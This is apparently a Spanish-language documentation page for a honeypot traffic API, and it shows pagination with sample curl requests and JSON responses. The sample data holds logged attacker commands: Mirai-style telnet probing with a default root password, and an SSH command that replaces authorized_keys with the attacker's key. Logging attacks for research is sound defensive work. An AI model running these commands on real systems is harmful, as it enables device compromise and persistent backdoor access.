La API de Tráfico No Deseado admite paginación para puntos finales que devuelven grandes conjuntos de datos, específicamente /sessions, /attempts y /malware. Esta página explica cómo usar los parámetros de paginación para navegar por los resultados de manera eficiente.
La paginación se controla mediante dos parámetros de consulta:
limit: El número máximo de registros a devolver en una sola respuesta (por defecto: 50, máximo: 100).offset: El número de registros a omitir antes de devolver los resultados (por defecto: 0).Estos parámetros te permiten recuperar datos en fragmentos manejables, especialmente cuando se combinan con filtros (ver Filtros).
Los puntos finales paginados incluyen un objeto pagination en la respuesta, que proporciona metadatos sobre el conjunto de resultados:
limit: El número de registros devueltos en la respuesta actual.offset: El índice inicial de los registros devueltos.totalRecords: El número total de registros que coinciden con la consulta (después de aplicar filtros).La matriz data contiene los registros reales, hasta el limit especificado.
Para recuperar las primeras 2 sesiones donde la IP de destino es "192.168.0.96":
Ejemplo de Solicitud:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/sessions?dst-ip=192.168.0.96&limit=2&offset=0"Ejemplo de Respuesta:
{
"status": "success",
"data": [
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 1,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "2a58f17a436b",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.23172,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "2a58f17a436b",
"session_id": 1,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61248,
"timestamp": "Sun, 23 Feb 2025 00:00:01 GMT",
"traffic_type": "attack"
},
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 2,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "818fa72b39c1",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.20777,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "818fa72b39c1",
"session_id": 2,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61254,
"timestamp": "Sun, 23 Feb 2025 00:00:02 GMT",
"traffic_type": "attack"
}
],
"pagination": {
"limit": 2,
"offset": 0,
"totalRecords": 9607
}
}Para recuperar las siguientes 2 sesiones (registros 3 y 4):
Ejemplo de Solicitud:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/sessions?dst-ip=192.168.0.96&limit=2&offset=2"Ejemplo de Respuesta:
{
"status": "success",
"data": [
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 3,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "9c2d4e8f127a",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.19543,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "9c2d4e8f127a",
"session_id": 3,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61260,
"timestamp": "Sun, 23 Feb 2025 00:00:03 GMT",
"traffic_type": "attack"
},
{
"attempts": [
{
"attempt_credentials": "root||xc3511",
"attempt_id": 4,
"attempt_login": "true",
"attempt_password": "xc3511",
"attempt_session": "3f9a2c6b850d",
"attempt_username": "root"
}
],
"commands": "sh; shell; enable; system; ping ;sh; >/usr/.a && cd /usr/; rm -rf .a; >/mnt/.a && cd /mnt/; rm -rf .a; >/var/run/.a && cd /var/run/; rm -rf .a; >/dev/shm/.a && cd /dev/shm/; rm -rf .a; >/etc/.a && cd /etc/; rm -rf .a; >/var/.a && cd /var/; rm -rf .a; >/tmp/.a && cd /tmp/; rm -rf .a; >/dev/.a && cd /dev/; rm -rf .a; >/var/home/user/fw/.a && cd /var/home/user/fw/; rm -rf .a; for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done; cat /proc/mounts | grep tmpfs | grep -v noexec | cut -d -f 2; /bin/busybox wget --help; /bin/busybox ftpget --help; /bin/busybox echo -e '\\\\x67\\\\x61\\\\x79\\\\x66\\\\x67\\\\x74';",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2723,
"duration": 1.20219,
"malware": [],
"protocol": "telnet",
"sensor": "raspberrypi",
"session": "3f9a2c6b850d",
"session_id": 4,
"src_asn": 4766,
"src_country": "South Korea",
"src_ip": "192.168.1.100",
"src_port": 61266,
"timestamp": "Sun, 23 Feb 2025 00:00:04 GMT",
"traffic_type": "attack"
}
],
"pagination": {
"limit": 2,
"offset": 2,
"totalRecords": 9607
}
}Para recuperar la segunda página de registros de malware (registros 3 y 4) donde el tipo de malware es "redir" y la IP de origen es "192.168.1.100":
Ejemplo de Solicitud:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" "https://defrancisco.us/unwanted-traffic/malware?malware-type=redir&src-ip=192.168.1.100&limit=2&offset=2"Ejemplo de Respuesta:
{
"status": "success",
"data": [
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 3,
"malware_session": "7b4f9a3c1e2d",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 6.23456,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "7b4f9a3c1e2d",
"session_id": 789,
"src_asn": 142002,
"src_country": "India",
"src_ip": "192.168.1.100",
"src_port": 52345,
"timestamp": "Sun, 23 Feb 2025 03:15:22 GMT",
"traffic_type": "attack"
}
},
{
"malware_hash": "a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2",
"malware_id": 4,
"malware_session": "9d2c5b7e4f1a",
"malware_site": "",
"malware_type": "redir",
"sessions": {
"commands": "cd ~; chattr -ia .ssh; lockr -ia .ssh; cd ~ && rm -rf .ssh && mkdir .ssh && echo \\\"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\\\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"dst_asn": 7922,
"dst_country": "United States",
"dst_ip": "192.168.0.96",
"dst_port": 2722,
"duration": 4.98765,
"protocol": "ssh",
"sensor": "raspberrypi",
"session": "9d2c5b7e4f1a",
"session_id": 823,
"src_asn": 396982,
"src_country": "Taiwan",
"src_ip": "192.168.1.100",
"src_port": 58912,
"timestamp": "Sun, 23 Feb 2025 03:20:47 GMT",
"traffic_type": "attack"
}
}
],
"pagination": {
"limit": 2,
"offset": 2,
"totalRecords": 678
}
}Para usar la paginación de manera efectiva:
limit para controlar el número de registros por solicitud, manteniéndolo razonable (por ejemplo, 10–50) para equilibrar rendimiento y usabilidad.offset por limit para recuperar páginas posteriores (por ejemplo, offset=0, offset=50, offset=100 para limit=50).totalRecords para determinar cuántas páginas están disponibles (ceil(totalRecords / limit)).limit excesivamente grandes para prevenir problemas de rendimiento; la API limita limit a 100.data vacías con gracia cuando offset excede el número de registros disponibles.